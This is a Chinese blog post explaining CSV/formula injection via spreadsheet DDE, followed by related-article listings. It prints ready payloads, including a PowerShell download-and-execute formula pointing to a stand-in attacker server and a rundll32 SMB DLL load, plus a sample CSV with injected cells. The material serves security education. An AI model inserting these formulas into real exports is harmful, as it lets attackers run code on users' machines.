csv注入java怎么解决_CSV Injection(CSV注入)

最新推荐文章于 2024-08-27 10:00:00 发布
最新推荐文章于 2024-08-27 10:00:00 发布
阅读量1.2k 收藏
点赞数
文章标签: csv注入java怎么解决
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34364239/article/details/114777782
版权

简介

许多web应用程序允许用户将发票模板或用户设置等内容下载到CSV文件中。许多用户选择在Excel、Libre Office或open Office中打开CSV文件。当web应用程序无法正确验证CSV文件的内容时,可能会导致执行一个或多个单元格的内容。

漏洞利用

最基本的利用方式是动态数据交换

# pop a calc

DDE ("cmd";"/C calc";"!A0")A0

@SUM(1+1)*cmd|' /C calc'!A0

=2+5+cmd|' /C calc'!A0

# pop a notepad

=cmd|' /C notepad'!'A1'

# powershell download and execute

=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0

# msf smb delivery with rundll32

=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

上述有效载荷的技术细节:

cmd 是每当客户端试图访问服务器时,服务器可以响应的名称

/C calc 是执行的文件名,(calc.exe即计算器)

!A0 是项名称,指定当客户端请求数据时服务器可以响应的数据单元

任何公式符号都可以用:

=

+

@

示例:

UserIdBillToDateProjectNameDescriptionDurationMinutes

12017/7/25Test ProjectFlipped the jibbet60

22017/7/25Important Client"Bop, dop, and giglip"240

22017/7/25Important Client"=2+5"240

22017/7/25Important Client"=2+5+cmd|' /C calc'!A0"240

22017/7/25Important Client"=cmd|' /C notepad'!'A1'"240

22017/7/25Important Client"=cmd|'/C powershell IEX(Write-Host "It's run!";)'!A0"240

cf1a6bf33ccfdf598d1526c5e22ac56b.png

af55665d954d3cf56ef35d698b18ee63.gif

流量特征如下:

0ddae28178bfe4c1fe0c1b7fc0f7c1b2.png

春三吉
关注
【漏洞挖掘】——46、 CSV注入实践操作
Fly_鹏程万里
06-07 169
CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量,攻击这可以向Excel文件中注入可以输出或以CSV文件读取的恶意攻击载荷,当用户打开Excel文件时,文件会从CSV描述转变为原始的Excel格式,包括Excel提供的所有动态功能,在这个过程中,CSV中的所有Excel公式都会执行,当该函数有合法意图时,很易被滥用并允许恶意代码执行。
java正则表达式反向字符集避坑
shuxiaohua的博客
03-04 222
系统导出功能会将自己的信息导出到excel中,为了CSV注入攻击,在录入这些字段时需要对内容做校验。CSV注入攻击主要是通过“+、-、@、=”构造一些特殊内容,这个内容导出到excel中,当有人打开这种带攻击的excel时,就可以执行任意命令,详细的攻击方法,大家可以搜索“CSV注入攻击”。
JAVA解决CSV注入漏洞的代码
搬砖人生的博客
10-29 3740
JAVA处理写入CSV的命令,函数等。处理特殊字符(“+、-、@、=”)以及逗号引起的格式问题
Web 安全之 CSV 注入攻击详解
最新发布
qq_44005305的博客
08-27 660
CSV 是一种简单的文件格式,用于存储表格数据,每行一个数据记录,每个记录由逗号分隔的多个字段组成。CSV文件因其简单性和跨平台性而被广泛使用,在数据导出和导入中尤其常见。CSV 注入攻击是攻击者通过某些方式在 CSV 文件中注入恶意的代码,并利用电子表格软件处理 CSV文件时的特性来执行恶意代码实现非法操作的攻击方式。这种攻击通常发生在应用程序在处理 CSV文件时,没有正确地校验或转义用户输入的特殊字符,从而被攻击者利用在 CSV 文件中注入恶意代码。
csv注入java怎么解决_浅谈CSV注入漏洞
weixin_29775447的博客
02-27 2002
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。背景某天在逛expdb时候看到了CSV Injection的exp,在渗透测试的过程中也偶尔会遇到类似的情况,这一漏洞很早之前就出现过,但是很多人没有意识到漏洞的危害性,于是抱着学习的心态进行了一波漏洞复现和学习。漏洞介绍CSV公式注入(CSV Injection)是一种会造成巨大影...
csv注入java怎么解决_csv注入利用和绕过总结
weixin_28802509的博客
02-27 2230
csv注入csv注入是一种将包含恶意命令的excel公式插入到可以导出csv或xls等格式的文本中,当在excel中打开csv文件时,文件会转换为excel格式并提供excel公式的执行功能,会造成命令执行问题。漏洞原理漏洞原理就是excel的一个特性,当单元格中内容以=-+@等符号开头时,excel将会将其当成一个公式处理。所以当我们输入=1+1时,excel会自动将其计算那么利用这个办法,把等...
csv注入java怎么解决_CSV 注入实战
weixin_34910679的博客
02-27 1141
oxo1 前言之前看到过 CSV 注入的文章,具体想了解的请搜索学习,这里不多作介绍。今天刚好碰到了导出功能,就随手测试一波,没想到还真的存在 CSV 注入漏洞。oxo2 经过1、测试漏洞看到有导出功能,就新建一个用户,随手插入 Payload导出 CSV 文件查看 CSV 文件,发现结果等于 2 ,说明存在漏洞。2、利用漏洞这里反弹 shell就在本地演示好了. 利用 powershell 来进...
csv注入java怎么解决_CSV文件注入漏洞简析
weixin_39907596的博客
02-27 2135
“对于网络安全来说,一切的外部输入均是不可信的”。但是CSV文件注入漏洞确时常被疏忽,究其原因,可能是因为我们脑海里的第一印象是把CSV文件当作了普通的文本文件,未能引起警惕。一、漏洞定义攻击者通过在CSV文件中构造恶意的命令或函数,使得正常用户在使用Excel打开这个CSV文件后恶意的命令或函数被执行,从而造成攻击行为。二、漏洞产生的原因1、CSV文件中的几个特殊符号“+、-、@、=”尝试在CS...
CSV InjectionCSV 注入攻击)
cwxbox
01-28 1281
CSV注入,也称为公式注入,发生在网站在CSV文件中嵌入不可信输入时。当使用电子表格程序(如Microsoft Excel或LibreOffice Calc)打开CSV时,所有以=开头的单元格都会被软件解释为一个公式。
csv注入初探以及利用
Cwh的个人博客
02-28 3433
简介 之前进行渗透的时候经常会碰见csv,excel导入的功能。也思考过潜在安全隐患,今天刚好看到fb里面的一篇文章,fb上的介绍并不详细,对于其中的利用方式很感兴趣,基于此进行了一番学习。 fb链接 https://www.freebuf.com/vuls/195656.html 漏洞介绍 CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量。攻击包含向恶意的EXCEL公...
csv-join:用于在C#.NET Core中对CSV文件执行完全外部联接的命令行工具
04-10
CSV加入 一个命令行工具,用于在C#.NET Core中对CSV文件执行完全外部联接: CsvJoin.exe Data sales.csv new_sales.csv > joined_sales.csv 特征: 对CSV文件执行SQL 将结果保存到CSV 保存自动生成SQL 先决条件...
java_cvs_解析
07-31
解析cvs
跟着开源项目学java3-从导出excelcsv注入的提交看注入类的安全问题的解决思路
qq_39007838的博客
12-26 1457
csv注入 若依 common-utils
【笔记】很杂---mysql/jquery/linux/java/CSV注入
M_Kalor
09-26 443
好记性不如烂笔头 1.group_concat 功能:将group by产生的同一个分组中的值连接起来,返回一个字符串结果。 语法:group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator '分隔符'] ) 说明:通过使用distinct可以排除重复值;如果希望对结果中的值进行排序,可以使用o...
CSV注入
94小菜
11-25 4581
CSV注入 漏洞简介: CSV注入(CSV Injection)漏洞通常会出现在有导出文件(.csv/.xls)功能的网站中。当导出的文件内容可控时,攻击者通常将恶意负载(公式)注入到输入字段中,用户导出文件打开后,EXCEL会调用本身的动态功能,执行攻击者的恶意代码,从而控制用户计算机。 漏洞原理: 在xls表格中,输入=1+1,回车后看到表格变成2,+号被当作运算执行了 不只是+号, = 、- 、@这三个符号也会被excel解析成共事 DDE(Dynamic Data Exchange)协议: DDE
CSV注入漏洞】
SHUY96的博客
12-30 1770
一、背景 最近在开发中,遇到CSV注入漏洞,特此研究一下。我们知道“对于网络安全来说,一切的外部输入都是不可信的”,但在我们大脑的第一印象中会把csv文件当做是普通的文件,未对其保持足够的警惕,从而引起安全漏洞问题。 二、定义 攻击人员通过在CSV中构造恶意的命令或函数,当正常用户使用Excel打开这个CSV文件时,恶意的命令或函数被执行,从而导致攻击的行为。 三、产生原因 1、CSV文件中的几个特殊字符+、-、@、=都可用于在Microsoft Excel中触发公式解释 例如:在CSV单元格中输入“=1+
csv注入java怎么解决_csv注入复现代码
weixin_29443201的博客
02-27 507
以下代码生成的csv文件,使用Microsoft Execl能成功弹出计算器,虽然打开时有安全提示,但是大多数src还是会接收该类漏洞--------------------------------------------------------------------------------------------package jinqi;public class User {private ...
oracle siebel crm 8.0,Oracle Siebel CRM 8.1.1 - CSV Injection
weixin_39869378的博客
04-03 111
# Exploit Title: Oracle Siebel CRM 8.1.1 - CSV Injection# Date: 2018-10-21# Exploit Author: Sarath Nair aka AceNeon13# Contact: @AceNeon13# Vendor Homepage: www.oracle.com# Software Link: http://www.o...
Java测试新纪元:TestNG与高级概念
TestNG支持依赖注入(Dependency Injection),可以通过@注入注解将对象实例化并注入到测试类中,简化了测试代码的编写。 7. **数据驱动测试**: 通过@DataProvider注解,TestNG允许数据驱动测试,可以从多种数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值